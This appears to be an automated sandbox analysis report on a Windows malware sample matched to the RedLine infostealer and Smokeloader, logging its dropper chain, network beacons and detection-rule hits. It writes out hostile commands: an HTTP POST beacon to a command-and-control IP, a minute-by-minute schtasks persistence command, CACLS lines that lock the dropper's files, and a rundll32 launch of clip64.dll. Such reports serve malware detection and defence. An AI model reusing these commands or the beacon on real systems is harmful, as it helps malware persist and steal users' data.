                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 08 Feb 2023 20:31:09 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                            Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                            Source: xriv.exe, 0000000F.00000002.402972020.0000000000D3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                            System Summary

                            barindex
                            Source: 2.2.amMl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.amMl.exe.5b0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.2.amMl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.3.amMl.exe.5e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.367095576.0000000000767000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                            Source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                            Source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D3BA20_2_011D3BA2
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D5C9E0_2_011D5C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F83BA21_2_00F83BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F85C9E1_2_00F85C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00408C602_2_00408C60
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0040DC112_2_0040DC11
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00407C3F2_2_00407C3F
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00418CCC2_2_00418CCC
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00406CA02_2_00406CA0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004028B02_2_004028B0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0041A4BE2_2_0041A4BE
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004182442_2_00418244
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004016502_2_00401650
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00402F202_2_00402F20
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004193C42_2_004193C4
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004187882_2_00418788
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00402F892_2_00402F89
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_00402B902_2_00402B90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004073A02_2_004073A0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B786D2_2_005B786D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B18B72_2_005B18B7
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B31F02_2_005B31F0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005C89EF2_2_005C89EF
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B31872_2_005B3187
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B2B172_2_005B2B17
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005C84AB2_2_005C84AB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B2DF72_2_005B2DF7
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005BDE782_2_005BDE78
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B8EC72_2_005B8EC7
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B7EA62_2_005B7EA6
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B6F072_2_005B6F07
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005C8F332_2_005C8F33
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005CA7252_2_005CA725
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_005B77D92_2_005B77D9
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_02390DB02_2_02390DB0
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_02390DA72_2_02390DA7
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011F853015_2_011F8530
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011F754D15_2_011F754D
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 15_2_011D67D015_2_011D67D0
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 2.2.amMl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.amMl.exe.5b0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.2.amMl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.3.amMl.exe.5e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.367095576.0000000000767000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                            Source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                            Source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_011D1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00F81F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: String function: 0040E1D8 appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: String function: 005BE43F appears 44 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 011E7CE0 appears 35 times
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 011E5E20 appears 130 times
                            Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 425676 bytes, 2 files, at 0x2c +A "bmMg.exe" +A "xriv.exe", ID 1580, number 1, 20 datablocks, 0x1503 compression
                            Source: bmMg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 234410 bytes, 2 files, at 0x2c +A "amMl.exe" +A "nika.exe", ID 1546, number 1, 12 datablocks, 0x1503 compression
                            Source: file.exe, 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\amMl.exe.logJump to behavior
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@37/14@0/1
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_011D597D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_0239A1A8 ChangeServiceConfigA,2_2_0239A1A8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_011D4FE0
                            Source: file.exeReversingLabs: Detection: 66%
                            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_011D1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCode function: 1_2_00F81F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00F81F90
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011D597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_011D597D
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_01
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_01
                            Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                            Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_011D2BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exeCommand line argument: Kernel32.dll1_2_00F82BFB
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeCommand line argument: 08A2_2_00413780
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
